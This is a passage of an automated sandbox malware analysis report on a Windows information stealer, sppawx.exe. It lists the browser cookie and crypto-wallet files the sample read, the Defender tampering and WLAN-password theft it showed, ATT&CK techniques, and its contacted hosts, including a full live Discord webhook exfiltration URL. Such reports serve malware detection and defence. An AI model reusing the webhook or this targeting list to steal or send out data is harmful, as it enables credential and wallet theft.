              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MaskableJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: sppawx.exe PID: 7808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD27507C bind,2_2_00007FFEDD27507C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD276080 listen,2_2_00007FFEDD276080
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              4
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              4
              Disable or Modify Tools
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager49
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS251
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
              Virtualization/Sandbox Evasion
              Proc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574325 Sample: sppawx.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 67 ip-api.com 2->67 69 discord.com 2->69 71 blank-jfr1z.in 2->71 85 Found malware configuration 2->85 87 Sigma detected: Capture Wi-Fi password 2->87 89 Multi AV Scanner detection for submitted file 2->89 91 12 other signatures 2->91 11 sppawx.exe 22 2->11         started        signatures3 process4 file5 59 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->59 dropped 61 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->61 dropped 63 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->63 dropped 65 16 other files (none is malicious) 11->65 dropped 107 Modifies Windows Defender protection settings 11->107 109 Adds a directory exclusion to Windows Defender 11->109 111 Tries to harvest and steal WLAN passwords 11->111 113 2 other signatures 11->113 15 sppawx.exe 71 11->15         started        signatures6 process7 dnsIp8 73 ip-api.com 208.95.112.1, 49716, 49795, 80 TUT-ASUS United States 15->73 75 discord.com 162.159.135.232, 443, 49799 CLOUDFLARENETUS United States 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 Modifies Windows Defender protection settings 15->81 83 6 other signatures 15->83 19 cmd.exe 1 15->19         started        22 cmd.exe 15->22         started        24 cmd.exe 1 15->24         started        26 36 other processes 15->26 signatures9 process10 signatures11 93 Suspicious powershell command line found 19->93 95 Uses cmd line tools excessively to alter registry or file data 19->95 97 Encrypted powershell cmdline option found 19->97 105 3 other signatures 19->105 28 powershell.exe 19->28         started        31 conhost.exe 19->31         started        33 powershell.exe 22->33         started        36 conhost.exe 22->36         started        99 Modifies Windows Defender protection settings 24->99 38 powershell.exe 23 24->38         started        44 2 other processes 24->44 101 Adds a directory exclusion to Windows Defender 26->101 103 Tries to harvest and steal WLAN passwords 26->103 40 getmac.exe 26->40         started        42 powershell.exe 26->42         started        46 69 other processes 26->46 process12 file13 55 C:\Users\user\AppData\...\vebzhwcp.cmdline, Unicode 33->55 dropped 115 Potential dropper URLs found in powershell memory 33->115 48 csc.exe 33->48         started        117 Loading BitLocker PowerShell Module 38->117 119 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 40->119 121 Writes or reads registry keys via WMI 40->121 57 C:\Users\user\AppData\Local\Temp\7VKXZ.zip, RAR 46->57 dropped signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\vebzhwcp.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              sppawx.exe37%ReversingLabsWin64.Trojan.Znyonm
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI78082\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_decimal.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_hashlib.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\python312.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\select.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\sqlite3.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pyd4%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.135.232
              truetrue
                ip-api.com
                208.95.112.1
                truetrue
                  blank-jfr1z.in
                  unknown
                  unknowntrue
                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMGtrue
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://ns.adobe.hotoshpowershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpfalse
                        https://duckduckgo.com/chrome_newtabsppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpfalse
                          https://github.com/Blank-c/BlankOBFsppawx.exe, 00000002.00000003.1318450801.0000018C7F336000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318293950.0000018C7F3A2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318879940.0000018C7F3C8000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1319218190.0000018C7F3CF000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318366035.0000018C7F334000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318569360.0000018C01C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                            https://www.avito.ru/sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmpfalse
                              https://duckduckgo.com/ac/?q=sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpfalse
                                http://ns.adobe.c.0/tipowershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  https://api.telegram.org/botsppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpfalse
                                    https://www.ctrip.com/sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpfalse
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://www.leboncoin.fr/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                          https://tools.ietf.org/html/rfc2388#section-4.4sppawx.exe, 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://weibo.com/sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                https://api.anonfiles.com/uploadsppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPssppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmptrue
                                                    https://www.msn.comsppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.1419951585.000002724448A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C7D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3E1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://discord.com/api/v9/users/sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            http://cacerts.digisppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://peps.python.org/pep-0205/sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                https://www.reddit.com/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  https://support.mozilla.org/kb/custoUsppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.1393896936.0000027234411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3C761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://www.amazon.ca/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamesppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxysppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://www.ebay.co.uk/sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                http://ns.adoraw-sepowershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://www.ebay.de/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codesppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://go.micropowershell.exe, 00000044.00000002.1539735870.000001AF3D638000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readersppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://www.amazon.com/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  https://github.com/python/cpython/issues/86361.sppawx.exe, 00000002.00000002.1747473298.0000018C7E7B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://crl.micpowershell.exe, 0000000B.00000002.1432087978.000002724CBE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://httpbin.org/sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0ssppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              http://www.microsoftISPLA~1.PNGy./sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulesppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachessppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://www.ecosia.org/newtab/sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://www.youtube.com/sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://allegro.pl/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sysppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://MD8.mozilla.org/1/msppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.python.org/psf/license/sppawx.exe, 00000002.00000002.1754174414.00007FFEDE022000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                      https://www.bbc.co.uk/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        https://bugzilla.mosppawx.exe, 00000002.00000002.1746430268.0000018C02568000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          http://tools.ietf.org/html/rfc6125#section-6.4.3sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoasppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://google.com/mailsppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://packaging.python.org/specifications/entry-points/sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1745892024.0000018C01C50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    https://www.python.org/psf/license/)sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pysppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://www.google.com/sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          https://www.iqiyi.com/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            https://foss.heptapod.net/pypy/pypy/-/issues/3539sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                http://google.com/sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://ns.photo/powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://ns.a.0/sTypowershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://ocsp.sectigo.com0sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1324714906.0000018C7F2F3000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1325603169.0000018C7F291000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.python.org/download/releases/2.3/mro/.sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://contoso.com/Licensepowershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://discordapp.com/api/v9/users/sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcesppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpfalse
